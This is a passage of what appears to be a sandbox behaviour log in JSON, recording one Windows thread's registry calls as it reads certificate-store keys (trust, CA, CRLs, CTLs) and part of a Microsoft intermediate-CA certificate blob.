"timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x000005fc" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2246 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x000005fc" + } + ], + "repeated": 0, + "id": 2247 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ad931", + "parentcaller": "0x756ad70b", + "category": "misc", + "api": "RtlSetCurrentTransaction", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "TransactionHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 2248 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000600" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000011c" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\trust" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\trust" + } + ], + "repeated": 0, + "id": 2249 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000604" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000600" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\trust\\Certificates" + } + ], + "repeated": 0, + "id": 2250 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000604" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2251 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000604" + } + ], + "repeated": 0, + "id": 2252 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000604" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000600" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\trust\\CRLs" + } + ], + "repeated": 0, + "id": 2253 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000604" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2254 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000604" + } + ], + "repeated": 0, + "id": 2255 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000604" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000600" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\trust\\CTLs" + } + ], + "repeated": 0, + "id": 2256 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000604" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2257 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000604" + } + ], + "repeated": 0, + "id": 2258 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000600" + } + ], + "repeated": 0, + "id": 2259 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000060c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000564" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Trust\\Certificates" + } + ], + "repeated": 0, + "id": 2260 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000060c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2261 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000060c" + } + ], + "repeated": 0, + "id": 2262 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000060c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000564" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Trust\\CRLs" + } + ], + "repeated": 0, + "id": 2263 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000060c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2264 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000060c" + } + ], + "repeated": 0, + "id": 2265 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000060c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000564" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Trust\\CTLs" + } + ], + "repeated": 0, + "id": 2266 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000060c" + }, + { + "name": "KeyInformation", + "value": "\\xffeda\\xffa1\\xffaa\r~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2267 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000060c" + } + ], + "repeated": 0, + "id": 2268 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000618" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000051c" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates" + } + ], + "repeated": 0, + "id": 2269 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000618" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2270 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000618" + } + ], + "repeated": 0, + "id": 2271 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000618" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000051c" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\CRLs" + } + ], + "repeated": 0, + "id": 2272 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000618" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2273 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000618" + } + ], + "repeated": 0, + "id": 2274 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000618" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000051c" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\CTLs" + } + ], + "repeated": 0, + "id": 2275 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000618" + }, + { + "name": "KeyInformation", + "value": "\\x1fi\\xffcb\\xfff4\\x0e~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2276 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000618" + } + ], + "repeated": 0, + "id": 2277 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000061c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000514" + }, + { + "name": "ObjectAttributesName", + "value": "Software\\Policies\\Microsoft\\SystemCertificates\\CA" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\SystemCertificates\\CA" + } + ], + "repeated": 0, + "id": 2278 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000620" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000061c" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\Certificates" + } + ], + "repeated": 0, + "id": 2279 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000620" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2280 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000620" + } + ], + "repeated": 0, + "id": 2281 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000620" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000061c" + }, + { + "name": "ObjectAttributesName", + "value": "CRLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\CRLs" + } + ], + "repeated": 0, + "id": 2282 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000620" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2283 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000620" + } + ], + "repeated": 0, + "id": 2284 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000620" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000061c" + }, + { + "name": "ObjectAttributesName", + "value": "CTLs" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA\\CTLs" + } + ], + "repeated": 0, + "id": 2285 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000620" + }, + { + "name": "KeyInformation", + "value": "\\xff91\\xffe05\\x04\\x11~\\xffdb\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2286 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767f27ff", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000620" + } + ], + "repeated": 0, + "id": 2287 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756ae44b", + "parentcaller": "0x767e8258", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000061c" + } + ], + "repeated": 0, + "id": 2288 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000628" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x0000050c" + }, + { + "name": "ObjectAttributesName", + "value": "Certificates" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates" + } + ], + "repeated": 0, + "id": 2289 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x7569b573", + "parentcaller": "0x756fbfea", + "category": "registry", + "api": "NtQueryKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000628" + }, + { + "name": "KeyInformation", + "value": "N+h%\\xffdf\\xffac\\xffd5\\x01\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00" + }, + { + "name": "KeyInformationClass", + "value": "4" + } + ], + "repeated": 1, + "id": 2290 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fd269", + "parentcaller": "0x756ac71b", + "category": "registry", + "api": "NtEnumerateKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x00000628" + }, + { + "name": "Index", + "value": "0" + } + ], + "repeated": 0, + "id": 2291 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fcf49", + "parentcaller": "0x756ad75e", + "category": "registry", + "api": "NtOpenKeyEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000062c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000628" + }, + { + "name": "ObjectAttributesName", + "value": "109F1CAED645BB78B3EA2B94C0697C740733031C" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\109F1CAED645BB78B3EA2B94C0697C740733031C" + } + ], + "repeated": 0, + "id": 2292 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc5aa", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffff80000005", + "pretty_return": "BUFFER_OVERFLOW", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000062c" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\CA\\Certificates\\109F1CAED645BB78B3EA2B94C0697C740733031C\\Blob" + } + ], + "repeated": 1, + "id": 2293 + }, + { + "timestamp": "2025-03-07 21:41:29,687", + "thread_id": "7084", + "caller": "0x756fc63b", + "parentcaller": "0x756ad3b0", + "category": "registry", + "api": "NtQueryValueKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000062c" + }, + { + "name": "ValueName", + "value": "Blob" + }, + { + "name": "Type", + "value": "3", + "pretty_value": "REG_BINARY" + }, + { + "name": "Information", + "value": "\\x19\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x83\\xb6S\\x18fNo\\xa2E\\xe0\\xd7`\\x9f\\xb9X \\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x10\\x9f\\x1c\\xae\\xd6E\\xbbx\\xb3\\xea+\\x94\\xc0i|t\\x073\\x03\\x1c\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00&]\\x05\\x07\\xd8/\\xa2`\\x84\\xbd\\x83}\\xf5!\\x80\\xa7\\x05oZ\\x85 \\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x13\\x04\\x00\\x000\\x82\\x04\\x0f0\\x82\\x02\\xf7\\xa0\\x03\\x02\\x01\\x02\\x02\n\\x19\\x8b\\x11\\xd1?\\x9a\\x8f\\xfei\\xa00\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x04\\x05\\x000p1+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation1!0\\x1f\\x06\\x03U\\x04\\x03\\x13\\x18Microsoft Root Authority0\\x1e\\x17\r971001070000Z\\x17\r021231070000Z0\\x81\\xc31+0)\\x06\\x03U\\x04\\x0b\\x13\"Copyright (c) 1997 Microsoft Corp.1A0?\\x06\\x03U\\x04\\x0b\\x138Microsoft Windows Hardware Compatibility Intermediate CA1\\x1e0\\x1c\\x06\\x03U\\x04\\x0b\\x13\\x15Microsoft Corporation110/\\x06\\x03U\\x04\\x03\\x13(Microsoft Windows Hardware 